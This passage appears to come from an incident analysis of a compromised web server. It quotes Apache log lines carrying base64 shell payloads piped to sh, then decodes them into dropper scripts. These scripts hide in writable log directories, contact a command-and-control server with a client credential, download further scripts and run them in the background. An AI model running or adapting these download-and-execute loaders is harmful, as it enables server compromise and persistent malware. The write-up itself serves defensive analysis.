[Sun Nov 14 01:25:50.735041 2021]  cyAtLWludGVyZmFjZSAkZXRoIC0tY29ubmVjdC10aW1lb3V0IDMgaHR0cDovLzExNi4yMDMuMjEyLjE4NC8xMDEwL29ubGluZS5waHAgLXUgY2xpZW50OiVAMTIzLTQ1NkAlIDI+IC9kZXYvbnVsbCk7IGVuYWJsZT0kKGVjaG8gJG91dCB8IGF3ayAne3NwbGl0KCQwLGEsIiwiKTsgcHJpbnQgYVsxXX0nKTsgb25saW5lPSQoZWNobyAkb3V0IHwgYXdrICd7c3BsaXQoJDAsYSwiLCIpOyBwcmludCBhWzJdfScpOyBpZiBbICIkZW5hYmxlIiA9PSAiMSIgLWEgIiRvbmxpbmUiIC1lcSAiMSIgXTsgdGhlbiBlY2hvICIkZXRoIiA+IC5pbnRlcmZhY2U7IGJyZWFrOyBmaTsgZG9uZTsgZmk7IGlmIFsgLWYgIi5pbnRlcmZhY2UiIF07IHRoZW4gQ1VSTD0iY3VybCAtLWludGVyZmFjZSAiJChjYXQgLmludGVyZmFjZSAyPiAvZGV2L251bGwpOyBET009IjExNi4yMDMuMjEyLjE4NCI7IGZpOyAkQ1VSTCAtcyBodHRwOi8vJERPTS8xMDEwL2I2NC5waHAgLXUgY2xpZW50OiVAMTIzLTQ1NkAlIC0tZGF0YS11cmxlbmNvZGUgJ3M9VUVGVVNEMHZjMkpwYmpvdlltbHVPaTkxYzNJdmMySnBiam92ZFhOeUwySnBiam92ZFhOeUwyeHZZMkZzTDJKcGJncERWVkpNUFNKamRYSnNJZ3BFVDAwOUluSnlMbUpzZFdWb1pXRjJaVzR1YkdsMlpTSUtDbkJyYVd4c0lDMDVJQzFtSUNJdWMzSmpMbk5vSWdwd2EybHNiQ0F0T1NBdFppQWljSEJ5YjNoNUlncHZkWFE5SkNoamRYSnNJQzF6SUMwdFkyOXVibVZqZEMxMGFXMWxiM1YwSURVZ2FIUjBjRG92TDNKeUxtSnNkV1ZvWldGMlpXNHViR2wyWlM4eE1ERXdMMjl1YkdsdVpTNXdhSEFnTFhVZ1kyeHBaVzUwT2lWQU1USXpMVFExTmtBbElESStJQzlrWlhZdmJuVnNiQ2tLWlc1aFlteGxQU1FvWldOb2J5QWtiM1YwSUh3Z1lYZHJJQ2Q3YzNCc2FYUW9KREFzWVN3aUxDSXBPeUJ3Y21sdWRDQmhXekZkZlNjcENtOXViR2x1WlQwa0tHVmphRzhnSkc5MWRDQjhJR0YzYXlBbmUzTndiR2wwS0NRd0xHRXNJaXdpS1RzZ2NISnBiblFnWVZzeVhYMG5LUXBwWmlCYklDRWdJaVJsYm1GaWJHVWlJQzFsY1NBaU1TSWdMV0VnSVNBaUpHOXViR2x1WlNJZ0xXVnhJQ0l4SWlCZE95QjBhR1Z1Q2dscFptRmpaWE05SWlJS0NXbG1JRnNnSWlRb1kyOXRiV0Z1WkNBdGRpQnBjQ0F5UGlBdlpHVjJMMjUxYkd3cElpQmRPeUIwYUdWdUNna0phV1poWTJWelBTUW9hWEFnTFRRZ0xXOGdZU0I4SUdOMWRDQXRaQ0FuSUNjZ0xXWWdNaXczSUh3Z1kzVjBJQzFrSUNjdkp5QXRaaUF4SUh3Z1lYZHJJQzFHSnlBbklDZDdjSEpwYm5RZ0pERjlKeUI4SUhSeUlDZGNiaWNnSnlBbktRb0paV3h6WlFvSkNXbG1JRnNnSWlRb1kyOXRiV0Z1WkNBdGRpQnBabU52Ym1acFp5QXlQaUF2WkdWMkwyNTFiR3dwSWlCZE95QjBhR1Z1Q2drSkNXbG1ZV05sY3owa0tHbG1ZMjl1Wm1sbklDMWhJSHdnWjNKbGNDQm1iR0ZuY3lCOElHRjNheUFuZTNOd2JHbDBLQ1F3TEdFc0lqb2lLVHNnY0hKcGJuUWdZVnN4WFgwbklId2dkSElnSjF4dUp5QW5J
[Sun Nov 14 01:25:50.735078 2021]  Q2NwQ2drSlpta0tDV1pwQ2dsbWIzSWdaWFJvSUdsdUlDUnBabUZqWlhNN0lHUnZDZ2tKYjNWMFBTUW9ZM1Z5YkNBdGN5QXRMV2x1ZEdWeVptRmpaU0FrWlhSb0lDMHRZMjl1Ym1WamRDMTBhVzFsYjNWMElEVWdhSFIwY0Rvdkx6RXhOaTR5TURNdU1qRXlMakU0TkM4eE1ERXdMMjl1YkdsdVpTNXdhSEFnTFhVZ1kyeHBaVzUwT2lWQU1USXpMVFExTmtBbElESStJQzlrWlhZdmJuVnNiQ2tLQ1FsbGJtRmliR1U5SkNobFkyaHZJQ1J2ZFhRZ2ZDQmhkMnNnSjN0emNHeHBkQ2drTUN4aExDSXNJaWs3SUhCeWFXNTBJR0ZiTVYxOUp5a0tDUWx2Ym14cGJtVTlKQ2hsWTJodklDUnZkWFFnZkNCaGQyc2dKM3R6Y0d4cGRDZ2tNQ3hoTENJc0lpazdJSEJ5YVc1MElHRmJNbDE5SnlrS0NRbHBaaUJiSUNJa1pXNWhZbXhsSWlBOVBTQWlNU0lnTFdFZ0lpUnZibXhwYm1VaUlEMDlJQ0l4SWlCZE95QjBhR1Z1Q2drSkNXVmphRzhnSWlSbGRHZ2lJRDRnTG1sdWRHVnlabUZqWlFvSkNRbGljbVZoYXdvSkNXWnBDZ2xrYjI1bENtWnBDZ3BwWmlCYklDMW1JQ0l1YVc1MFpYSm1ZV05sSWlCZE95QjBhR1Z1Q2dsRFZWSk1QU0pqZFhKc0lDMHRhVzUwWlhKbVlXTmxJQ0lrS0dOaGRDQXVhVzUwWlhKbVlXTmxJREkrSUM5a1pYWXZiblZzYkNrS0NVUlBUVDBpTVRFMkxqSXdNeTR5TVRJdU1UZzBJZ3BtYVFvS2IzVjBQU1FvSkVOVlVrd2dMWE1nYUhSMGNEb3ZMeVJFVDAwdk1UQXhNQzl6Y21NdWNHaHdJQzExSUdOc2FXVnVkRG9sUURFeU15MDBOVFpBSlNBeVBpQXZaR1YyTDI1MWJHd3BDbVZ1WVdKc1pUMGtLR1ZqYUc4Z0pHOTFkQ0I4SUdGM2F5QW5lM053YkdsMEtDUXdMR0VzSWl3aUtUc2djSEpwYm5RZ1lWc3hYWDBuS1FwaVlYTmxQU1FvWldOb2J5QWtiM1YwSUh3Z1lYZHJJQ2Q3YzNCc2FYUW9KREFzWVN3aUxDSXBPeUJ3Y21sdWRDQmhXekpkZlNjcENtbG1JRnNnSWlSbGJtRmliR1VpSUMxbGNTQWlNU0lnWFRzZ2RHaGxiZ29KY20wZ0xYSm1JQzV0YVc1cFkyOXVaR0V1YzJnZ0xtRndhU0F1YVhCcFpDQXVjM0JwWkNBdVkzSnZiaTV6YUNBdWMzSmpMbk5vT3lBa1ExVlNUQ0F0Y3lCb2RIUndPaTh2SkVSUFRTOHhNREV3TDJJMk5DNXdhSEFnTFhVZ1kyeHBaVzUwT2lWQU1USXpMVFExTmtBbElDMHRaR0YwWVMxMWNteGxibU52WkdVZ0luTTlKR0poYzJVaUlDMXZJQzV6Y21NdWMyZ2dNajRnTDJSbGRpOXVkV3hzSUNZbUlHTm9iVzlrSUN0NElDNXpjbU11YzJnZ1BpQXZaR1YyTDI1MWJHd2dNajRtTVFvSmMyZ2dMbk55WXk1emFDQStJQzlrWlhZdmJuVnNiQ0F5UGlZeElDWUtabWtLY20wZ0xYSm1JQzVwYm5OMFlXeHNDZz09JyAtbyAuaW5zdGFsbDsgY2htb2QgK3ggLmluc3RhbGw7IHNoIC5pbnN0YWxsID4gL2Rldi9udWxsIDI+JjEgJiBlY2hvICdEb25lJzsgZWxzZSBlY2hvICdBbHJlYWR5IGluc3RhbGwuIFN0YXJ0ZWQnOyBjZCAubG9nLzEwMTA2OC8uc3Bvb2xsb2cgJiYgc2ggLmNyb24uc2ggPiAvZGV2L251bGwgMj4mMSAmIGZp
[Sun Nov 14 01:25:50.735111 2021]  OyBlbHNlIGVjaG8gJ0FscmVhZHkgaW5zdGFsbCBSdW5uaW5nJztmaQ==' | sh 2>&1
[Sun Nov 14 03:12:39.237848 2021]  A=|echo;PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin;curl -s http://116.203.212.184/1010/b64.php -u client:%@123-456@% --data-urlencode 's=UEFUSD0vc2JpbjovYmluOi91c3Ivc2JpbjovdXNyL2JpbjovdXNyL2xvY2FsL2JpbjtpcGF0aD0nbnVsbCc7IGZvciBsaW5lIGluICQoZmluZCAvdmFyL2xvZyAtdHlwZSBkIDI+IC9kZXYvbnVsbCk7IGRvIGlmIFsgLXcgJGxpbmUgXTsgdGhlbiBpcGF0aD0kbGluZTsgYnJlYWs7IGZpOyBkb25lOyBpZiBbICIkaXBhdGgiID0gIm51bGwiIF07IHRoZW4gaXBhdGg9JChjYXQgL2V0Yy9wYXNzd2QgfCBncmVwICJeJCh3aG9hbWkpIiB8IGN1dCAtZDogLWY2KTsgZm9yIGxpbmUgaW4gJChmaW5kICRpcGF0aCAtdHlwZSBkIDI+IC9kZXYvbnVsbCk7IGRvIGlmIFsgLXcgJGxpbmUgXTsgdGhlbiBpcGF0aD0kbGluZTsgYnJlYWs7IGZpOyBkb25lOyBpZiBbICEgLXcgJGlwYXRoIF07IHRoZW4gaXBhdGg9Jy92YXIvdG1wJzsgaWYgWyAhIC13ICRpcGF0aCBdOyB0aGVuIGlwYXRoPScvdG1wJzsgZmk7IGZpOyBmaQppZiBbICEgIiQocHMgYXV4IHwgZ3JlcCAtdiBncmVwIHwgZ3JlcCAnLnNyYy5zaCcpIiBdOyB0aGVuIAoJY2QgJGlwYXRoCglpZiBbICEgLWYgIi5sb2cvMTAxMDY4Ly5zcG9vbGxvZy8uc3JjLnNoIiAtbyAhIC1mICIubG9nLzEwMTA2OC8uc3Bvb2xsb2cvLmNyb24uc2giIF07IHRoZW4KCQlpZiBbICEgLWQgIi5sb2cvMTAxMDY4Ly5zcG9vbGxvZyIgXTsgdGhlbiAKCQkJaT0xMDEwMDA7d2hpbGUgWyAkaSAtbmUgMTAxMTAwIF07IGRvIGk9JCgoJGkrMSkpOyBta2RpciAtcCAubG9nLyRpLy5zcG9vbGxvZzsgZG9uZQoJCWZpCgkJY2QgLmxvZy8xMDEwNjgvLnNwb29sbG9nICYmIGVjaG8gJ2FwYWNoZScgPiAucGluZm8gJiYgQ1VSTD0iY3VybCI7RE9NPSJyci5ibHVlaGVhdmVuLmxpdmUiO291dD0kKGN1cmwgLXMgLS1jb25uZWN0LXRpbWVvdXQgMyBodHRwOi8vcnIuYmx1ZWhlYXZlbi5saXZlLzEwMTAvb25saW5lLnBocCAtdSBjbGllbnQ6JUAxMjMtNDU2QCUgMj4gL2Rldi9udWxsKTtlbmFibGU9JChlY2hvICRvdXQgfCBhd2sgJ3tzcGxpdCgkMCxhLCIsIik7IHByaW50IGFbMV19Jyk7b25saW5lPSQoZWNobyAkb3V0IHwgYXdrICd7c3BsaXQoJDAsYSwiLCIpOyBwcmludCBhWzJdfScpOyBpZiBbICEgIiRlbmFibGUiIC1lcSAiMSIgLWEgISAiJG9ubGluZSIgLWVxICIxIiBdOyB0aGVuIGlmYWNlcz0iIjsgaWYgWyAiJChjb21tYW5kIC12IGlwIDI+IC9kZXYvbnVsbCkiIF07IHRoZW4gaWZhY2VzPSQoaXAgLTQgLW8gYSB8IGN1dCAtZCAnICcgLWYgMiw3IHwgY3V0IC1kICcvJyAtZiAxIHwgYXdrIC1GJyAnICd7cHJpbnQgJDF9JyB8IHRyICdcbicgJyAnKTsgIGVsc2UgaWYgWyAiJChjb21tYW5kIC12IGlmY29uZmlnIDI+IC9kZXYvbnVsbCkiIF07IHRoZW4gaWZhY2VzPSQoaWZjb25maWcgLWEg
[Sun Nov 14 03:12:39.237940 2021]  fCBncmVwIGZsYWdzIHwgYXdrICd7c3BsaXQoJDAsYSwiOiIpOyBwcmludCBhWzFdfScgfCB0ciAnXG4nICcgJyk7IGZpOyBmaTsgZm9yIGV0aCBpbiAkaWZhY2VzOyBkbyBvdXQ9JChjdXJsIC1zIC0taW50ZXJmYWNlICRldGggLS1jb25uZWN0LXRpbWVvdXQgMyBodHRwOi8vMTE2LjIwMy4yMTIuMTg0LzEwMTAvb25saW5lLnBocCAtdSBjbGllbnQ6JUAxMjMtNDU2QCUgMj4gL2Rldi9udWxsKTsgZW5hYmxlPSQoZWNobyAkb3V0IHwgYXdrICd7c3BsaXQoJDAsYSwiLCIpOyBwcmludCBhWzFdfScpOyBvbmxpbmU9JChlY2hvICRvdXQgfCBhd2sgJ3tzcGxpdCgkMCxhLCIsIik7IHByaW50IGFbMl19Jyk7IGlmIFsgIiRlbmFibGUiID09ICIxIiAtYSAiJG9ubGluZSIgLWVxICIxIiBdOyB0aGVuIGVjaG8gIiRldGgiID4gLmludGVyZmFjZTsgYnJlYWs7IGZpOyBkb25lOyBmaTsgaWYgWyAtZiAiLmludGVyZmFjZSIgXTsgdGhlbiBDVVJMPSJjdXJsIC0taW50ZXJmYWNlICIkKGNhdCAuaW50ZXJmYWNlIDI+IC9kZXYvbnVsbCk7IERPTT0iMTE2LjIwMy4yMTIuMTg0IjsgZmk7ICRDVVJMIC1zIGh0dHA6Ly8kRE9NLzEwMTAvYjY0LnBocCAtdSBjbGllbnQ6JUAxMjMtNDU2QCUgLS1kYXRhLXVybGVuY29kZSAncz1VRUZVU0QwdmMySnBiam92WW1sdU9pOTFjM0l2YzJKcGJqb3ZkWE55TDJKcGJqb3ZkWE55TDJ4dlkyRnNMMkpwYmdwRFZWSk1QU0pqZFhKc0lncEVUMDA5SW5KeUxtSnNkV1ZvWldGMlpXNHViR2wyWlNJS0NuQnJhV3hzSUMwNUlDMW1JQ0l1YzNKakxuTm9JZ3B3YTJsc2JDQXRPU0F0WmlBaWNIQnliM2g1SWdwdmRYUTlKQ2hqZFhKc0lDMXpJQzB0WTI5dWJtVmpkQzEwYVcxbGIzVjBJRFVnYUhSMGNEb3ZMM0p5TG1Kc2RXVm9aV0YyWlc0dWJHbDJaUzh4TURFd0wyOXViR2x1WlM1d2FIQWdMWFVnWTJ4cFpXNTBPaVZBTVRJekxUUTFOa0FsSURJK0lDOWtaWFl2Ym5Wc2JDa0taVzVoWW14bFBTUW9aV05vYnlBa2IzVjBJSHdnWVhkcklDZDdjM0JzYVhRb0pEQXNZU3dpTENJcE95QndjbWx1ZENCaFd6RmRmU2NwQ205dWJHbHVaVDBrS0dWamFHOGdKRzkxZENCOElHRjNheUFuZTNOd2JHbDBLQ1F3TEdFc0lpd2lLVHNnY0hKcGJuUWdZVnN5WFgwbktRcHBaaUJiSUNFZ0lpUmxibUZpYkdVaUlDMWxjU0FpTVNJZ0xXRWdJU0FpSkc5dWJHbHVaU0lnTFdWeElDSXhJaUJkT3lCMGFHVnVDZ2xwWm1GalpYTTlJaUlLQ1dsbUlGc2dJaVFvWTI5dGJXRnVaQ0F0ZGlCcGNDQXlQaUF2WkdWMkwyNTFiR3dwSWlCZE95QjBhR1Z1Q2drSmFXWmhZMlZ6UFNRb2FYQWdMVFFnTFc4Z1lTQjhJR04xZENBdFpDQW5JQ2NnTFdZZ01pdzNJSHdnWTNWMElDMWtJQ2N2SnlBdFppQXhJSHdnWVhkcklDMUdKeUFuSUNkN2NISnBiblFnSkRGOUp5QjhJSFJ5SUNkY2JpY2dKeUFuS1FvSlpXeHpaUW9KQ1dsbUlGc2dJaVFvWTI5dGJXRnVaQ0F0ZGlCcFptTnZibVpwWnlBeVBpQXZaR1YyTDI1MWJHd3BJaUJkT3lCMGFHVnVDZ2tKQ1ds
[Sun Nov 14 03:12:39.237980 2021]  bVlXTmxjejBrS0dsbVkyOXVabWxuSUMxaElId2daM0psY0NCbWJHRm5jeUI4SUdGM2F5QW5lM053YkdsMEtDUXdMR0VzSWpvaUtUc2djSEpwYm5RZ1lWc3hYWDBuSUh3Z2RISWdKMXh1SnlBbklDY3BDZ2tKWm1rS0NXWnBDZ2xtYjNJZ1pYUm9JR2x1SUNScFptRmpaWE03SUdSdkNna0piM1YwUFNRb1kzVnliQ0F0Y3lBdExXbHVkR1Z5Wm1GalpTQWtaWFJvSUMwdFkyOXVibVZqZEMxMGFXMWxiM1YwSURVZ2FIUjBjRG92THpFeE5pNHlNRE11TWpFeUxqRTROQzh4TURFd0wyOXViR2x1WlM1d2FIQWdMWFVnWTJ4cFpXNTBPaVZBTVRJekxUUTFOa0FsSURJK0lDOWtaWFl2Ym5Wc2JDa0tDUWxsYm1GaWJHVTlKQ2hsWTJodklDUnZkWFFnZkNCaGQyc2dKM3R6Y0d4cGRDZ2tNQ3hoTENJc0lpazdJSEJ5YVc1MElHRmJNVjE5SnlrS0NRbHZibXhwYm1VOUpDaGxZMmh2SUNSdmRYUWdmQ0JoZDJzZ0ozdHpjR3hwZENna01DeGhMQ0lzSWlrN0lIQnlhVzUwSUdGYk1sMTlKeWtLQ1FscFppQmJJQ0lrWlc1aFlteGxJaUE5UFNBaU1TSWdMV0VnSWlSdmJteHBibVVpSUQwOUlDSXhJaUJkT3lCMGFHVnVDZ2tKQ1dWamFHOGdJaVJsZEdnaUlENGdMbWx1ZEdWeVptRmpaUW9KQ1FsaWNtVmhhd29KQ1dacENnbGtiMjVsQ21acENncHBaaUJiSUMxbUlDSXVhVzUwWlhKbVlXTmxJaUJkT3lCMGFHVnVDZ2xEVlZKTVBTSmpkWEpzSUMwdGFXNTBaWEptWVdObElDSWtLR05oZENBdWFXNTBaWEptWVdObElESStJQzlrWlhZdmJuVnNiQ2tLQ1VSUFRUMGlNVEUyTGpJd015NHlNVEl1TVRnMElncG1hUW9LYjNWMFBTUW9KRU5WVWt3Z0xYTWdhSFIwY0Rvdkx5UkVUMDB2TVRBeE1DOXpjbU11Y0dod0lDMTFJR05zYVdWdWREb2xRREV5TXkwME5UWkFKU0F5UGlBdlpHVjJMMjUxYkd3cENtVnVZV0pzWlQwa0tHVmphRzhnSkc5MWRDQjhJR0YzYXlBbmUzTndiR2wwS0NRd0xHRXNJaXdpS1RzZ2NISnBiblFnWVZzeFhYMG5LUXBpWVhObFBTUW9aV05vYnlBa2IzVjBJSHdnWVhkcklDZDdjM0JzYVhRb0pEQXNZU3dpTENJcE95QndjbWx1ZENCaFd6SmRmU2NwQ21sbUlGc2dJaVJsYm1GaWJHVWlJQzFsY1NBaU1TSWdYVHNnZEdobGJnb0pjbTBnTFhKbUlDNXRhVzVwWTI5dVpHRXVjMmdnTG1Gd2FTQXVhWEJwWkNBdWMzQnBaQ0F1WTNKdmJpNXphQ0F1YzNKakxuTm9PeUFrUTFWU1RDQXRjeUJvZEhSd09pOHZKRVJQVFM4eE1ERXdMMkkyTkM1d2FIQWdMW
[Sun Nov 14 03:12:39.238012 2021]  FVnWTJ4cFpXNTBPaVZBTVRJekxUUTFOa0FsSUMwdFpHRjBZUzExY214bGJtTnZaR1VnSW5NOUpHSmhjMlVpSUMxdklDNXpjbU11YzJnZ01qNGdMMlJsZGk5dWRXeHNJQ1ltSUdOb2JXOWtJQ3Q0SUM1emNtTXVjMmdnUGlBdlpHVjJMMjUxYkd3Z01qNG1NUW9KYzJnZ0xuTnlZeTV6YUNBK0lDOWtaWFl2Ym5Wc2JDQXlQaVl4SUNZS1pta0tjbTBnTFhKbUlDNXBibk4wWVd4c0NnPT0nIC1vIC5pbnN0YWxsOyBjaG1vZCAreCAuaW5zdGFsbDsgc2ggLmluc3RhbGwgPiAvZGV2L251bGwgMj4mMSAmIAoJCWVjaG8gJ0RvbmUnCgllbHNlCgkJZWNobyAnQWxyZWFkeSBpbnN0YWxsLiBTdGFydGVkJzsgY2QgLmxvZy8xMDEwNjgvLnNwb29sbG9nICYmIHNoIC5jcm9uLnNoID4gL2Rldi9udWxsIDI+JjEgJiAKCWZpCmVsc2UgCgllY2hvICdBbHJlYWR5IGluc3RhbGwgUnVubmluZycKZmkK' | sh 2>&1

After an initial check to see if the web server is vulnerable, the next three requests attempt to launch encoded scripts by bouncing the decoding off the URL hxxp://116.203.212.184/1010/b64.php. The hard-coded IP in the URL is owned by the same hosting provider as the IP of the original request. Also note the possibly unique client ID “client:%@123-456@%” in the requests.

Decoding the first request, we get back a simple script that checks to see if a process named “.src.sh” is already running:

if [ ! "$(ps aux | grep -v grep | grep '.src.sh')" ]; then
        printf %b "no process\n"
else
        printf %b "running\n"
fi

Then there are web requests at 01:25 and 03:12 with much larger encoded blobs. Decoding both blobs, we find essentially the same script with minor modifications. Here’s the script from the 01:25 web request, which I’ve decoded and reformatted for easier reading:

PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin;

ipath='null';
for line in $(find /var/log -type d 2> /dev/null); do
    if [ -w $line ]; then
        ipath=$line;
        break;
    fi;
done;

if [ "$ipath" = "null" ]; then
    ipath=$(cat /etc/passwd | grep "^$(whoami)" | cut -d: -f6);
    for line in $(find $ipath -type d 2> /dev/null); do
        if [ -w $line ]; then
            ipath=$line;
            break;
        fi;
    done;

    if [ ! -w $ipath ]; then
        ipath='/var/tmp';
        if [ ! -w $ipath ]; then
            ipath='/tmp';
        fi;
    fi;
fi;

if [ ! "$(ps aux | grep -v grep | grep '.src.sh')" ]; then
    cd $ipath &&
    if [ ! -d ".log/101068" ]; then
        i=101000;
        while [ $i -ne 101100 ]; do
            i=$(($i+1));
            mkdir -p .log/$i/.spoollog;
        done &&
        cd .log/101068/.spoollog &&
        echo 'apache' > .pinfo &&
        CURL="curl";
        DOM="rr.blueheaven.live";
        out=$(curl -s --connect-timeout 3 http://rr.blueheaven.live/1010/online.php -u client:%@123-456@% 2> /dev/null);
        enable=$(echo $out | awk '{split($0,a,","); print a[1]}');
        online=$(echo $out | awk '{split($0,a,","); print a[2]}');
        if [ ! "$enable" -eq "1" -a ! "$online" -eq "1" ]; then
            ifaces="";
            if [ "$(command -v ip 2> /dev/null)" ]; then
                ifaces=$(ip -4 -o a | cut -d ' ' -f 2,7 | cut -d '/' -f 1 | awk -F' ' '{print $1}' | tr '\n' ' ');
            else if [ "$(command -v ifconfig 2> /dev/null)" ]; then
                ifaces=$(ifconfig -a | grep flags | awk '{split($0,a,":"); print a[1]}' | tr '\n' ' ');
            fi;
        fi;

        for eth in $ifaces; do
            out=$(curl -s --interface $eth --connect-timeout 3 http://116.203.212.184/1010/online.php -u client:%@123-456@% 2> /dev/null);
            enable=$(echo $out | awk '{split($0,a,","); print a[1]}');
            online=$(echo $out | awk '{split($0,a,","); print a[2]}');
            if [ "$enable" == "1" -a "$online" -eq "1" ]; then
                echo "$eth" > .interface;
                break;
            fi;
        done;
    fi;

    if [ -f ".interface" ]; then
        CURL="curl --interface "$(cat .interface 2> /dev/null);
        DOM="116.203.212.184";
    fi;
    $CURL -s http://$DOM/1010/b64.php -u client:%@123-456@% --data-urlencode 's=UEFUSD0vc2JpbjovYmluOi91c3Ivc2JpbjovdXNyL2JpbjovdXNyL2xvY2FsL2JpbgpDVVJMPSJjdXJsIgpET009InJyLmJsdWVoZWF2ZW4ubGl2ZSIKCnBraWxsIC05IC1mICIuc3JjLnNoIgpwa2lsbCAtOSAtZiAicHByb3h5IgpvdXQ9JChjdXJsIC1zIC0tY29ubmVjdC10aW1lb3V0IDUgaHR0cDovL3JyLmJsdWVoZWF2ZW4ubGl2ZS8xMDEwL29ubGluZS5waHAgLXUgY2xpZW50OiVAMTIzLTQ1NkAlIDI+IC9kZXYvbnVsbCkKZW5hYmxlPSQoZWNobyAkb3V0IHwgYXdrICd7c3BsaXQoJDAsYSwiLCIpOyBwcmludCBhWzFdfScpCm9ubGluZT0kKGVjaG8gJG91dCB8IGF3ayAne3NwbGl0KCQwLGEsIiwiKTsgcHJpbnQgYVsyXX0nKQppZiBbICEgIiRlbmFibGUiIC1lcSAiMSIgLWEgISAiJG9ubGluZSIgLWVxICIxIiBdOyB0aGVuCglpZmFjZXM9IiIKCWlmIFsgIiQoY29tbWFuZCAtdiBpcCAyPiAvZGV2L251bGwpIiBdOyB0aGVuCgkJaWZhY2VzPSQoaXAgLTQgLW8gYSB8IGN1dCAtZCAnICcgLWYgMiw3IHwgY3V0IC1kICcvJyAtZiAxIHwgYXdrIC1GJyAnICd7cHJpbnQgJDF9JyB8IHRyICdcbicgJyAnKQoJZWxzZQoJCWlmIFsgIiQoY29tbWFuZCAtdiBpZmNvbmZpZyAyPiAvZGV2L251bGwpIiBdOyB0aGVuCgkJCWlmYWNlcz0kKGlmY29uZmlnIC1hIHwgZ3JlcCBmbGFncyB8IGF3ayAne3NwbGl0KCQwLGEsIjoiKTsgcHJpbnQgYVsxXX0nIHwgdHIgJ1xuJyAnICcpCgkJZmkKCWZpCglmb3IgZXRoIGluICRpZmFjZXM7IGRvCgkJb3V0PSQoY3VybCAtcyAtLWludGVyZmFjZSAkZXRoIC0tY29ubmVjdC10aW1lb3V0IDUgaHR0cDovLzExNi4yMDMuMjEyLjE4NC8xMDEwL29ubGluZS5waHAgLXUgY2xpZW50OiVAMTIzLTQ1NkAlIDI+IC9kZXYvbnVsbCkKCQllbmFibGU9JChlY2hvICRvdXQgfCBhd2sgJ3tzcGxpdCgkMCxhLCIsIik7IHByaW50IGFbMV19JykKCQlvbmxpbmU9JChlY2hvICRvdXQgfCBhd2sgJ3tzcGxpdCgkMCxhLCIsIik7IHByaW50IGFbMl19JykKCQlpZiBbICIkZW5hYmxlIiA9PSAiMSIgLWEgIiRvbmxpbmUiID09ICIxIiBdOyB0aGVuCgkJCWVjaG8gIiRldGgiID4gLmludGVyZmFjZQoJCQlicmVhawoJCWZpCglkb25lCmZpCgppZiBbIC1mICIuaW50ZXJmYWNlIiBdOyB0aGVuCglDVVJMPSJjdXJsIC0taW50ZXJmYWNlICIkKGNhdCAuaW50ZXJmYWNlIDI+IC9kZXYvbnVsbCkKCURPTT0iMTE2LjIwMy4yMTIuMTg0IgpmaQoKb3V0PSQoJENVUkwgLXMgaHR0cDovLyRET00vMTAxMC9zcmMucGhwIC11IGNsaWVudDolQDEyMy00NTZAJSAyPiAvZGV2L251bGwpCmVuYWJsZT0kKGVjaG8gJG91dCB8IGF3ayAne3NwbGl0KCQwLGEsIiwiKTsgcHJpbnQgYVsxXX0nKQpiYXNlPSQoZWNobyAkb3V0IHwgYXdrICd7c3BsaXQoJDAsYSwiLCIpOyBwcmludCBhWzJdfScpCmlmIFsgIiRlbmFibGUiIC1lcSAiMSIgXTsgdGhlbgoJcm0gLXJmIC5taW5pY29uZGEuc2ggLmFwaSAuaXBpZCAuc3BpZCAuY3Jvbi5zaCAuc3JjLnNoOyAkQ1VSTCAtcyBodHRwOi8vJERPTS8xMDEwL2I2NC5waHAgLXUgY2xpZW50OiVAMTIzLTQ1NkAlIC0tZGF0YS11cmxlbmNvZGUgInM9JGJhc2UiIC1vIC5zcmMuc2ggMj4gL2Rldi9udWxsICYmIGNobW9kICt4IC5zcmMuc2ggPiAvZGV2L251bGwgMj4mMQoJc2ggLnNyYy5zaCA+IC9kZXYvbnVsbCAyPiYxICYKZmkKcm0gLXJmIC5pbnN0YWxsCg==' -o .install;
    chmod +x .install;
    sh .install > /dev/null 2>&1 & echo 'Done';
else
    echo 'Already install. Started';
    cd .log/101068/.spoollog && sh .cron.sh > /dev/null 2>&1 &
fi;
else
    echo 'Already install Running';
fi

I’m not going to go through this script in detail, nor critique the shell programming. The first part of the script goes about setting up an installation directory for the exploit, and you can see references to the “.log/101068/.spoollog” directory we found the exploit running from. The script attempts to check internet access via the URLs hxxp://rr.blueheaven.live/1010/online.php and hxxp://116.203.212.184/1010/online.php. At the time of this writing rr.blueheaven.live resolves to the hard-coded IP 116.203.212.184 in the second URL. The script then users hxxp://116.203.212.184/1010/b64.php to decode another script and write it to disk in the exploit installation directory as “.install” and then runs the script.

Here is the decoded, reformatted script that gets written to “.install”:

PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin
CURL="curl"
DOM="rr.blueheaven.live"

pkill -9 -f ".src.sh"
pkill -9 -f "pproxy"
out=$(curl -s --connect-timeout 5 http://rr.blueheaven.live/1010/online.php -u client:%@123-456@% 2> /dev/null)
enable=$(echo $out | awk '{split($0,a,","); print a[1]}')
online=$(echo $out | awk '{split($0,a,","); print a[2]}')
if [ ! "$enable" -eq "1" -a ! "$online" -eq "1" ]; then
        ifaces=""
        if [ "$(command -v ip 2> /dev/null)" ]; then
                ifaces=$(ip -4 -o a | cut -d ' ' -f 2,7 | cut -d '/' -f 1 | awk -F' ' '{print $1}' | tr '\n' ' ')
        else
                if [ "$(command -v ifconfig 2> /dev/null)" ]; then
                        ifaces=$(ifconfig -a | grep flags | awk '{split($0,a,":"); print a[1]}' | tr '\n' ' ')
                fi
        fi
        for eth in $ifaces; do
                out=$(curl -s --interface $eth --connect-timeout 5 http://116.203.212.184/1010/online.php -u client:%@123-456@% 2> /dev/null)
                enable=$(echo $out | awk '{split($0,a,","); print a[1]}')
                online=$(echo $out | awk '{split($0,a,","); print a[2]}')
                if [ "$enable" == "1" -a "$online" == "1" ]; then
                        echo "$eth" > .interface
                        break
                fi
        done
fi

if [ -f ".interface" ]; then
        CURL="curl --interface "$(cat .interface 2> /dev/null)
        DOM="116.203.212.184"
fi

out=$($CURL -s http://$DOM/1010/src.php -u client:%@123-456@% 2> /dev/null)
enable=$(echo $out | awk '{split($0,a,","); print a[1]}')
base=$(echo $out | awk '{split($0,a,","); print a[2]}')
if [ "$enable" -eq "1" ]; then
        rm -rf .miniconda.sh .api .ipid .spid .cron.sh .src.sh; $CURL -s http://$DOM/1010/b64.php -u client:%@123-456@% --data-urlencode "s=$base" -o .src.sh 2> /dev/null && chmod +x .src.sh > /dev/null 2>&1
        sh .src.sh > /dev/null 2>&1 &
fi
rm -rf .install

There’s a lot of repetitious code here, but the upshot is that this “.install” script downloads an encoded script from http://116.203.212.184/1010/src.php and this becomes “.src.sh”. The “.install” script removes itself when done.

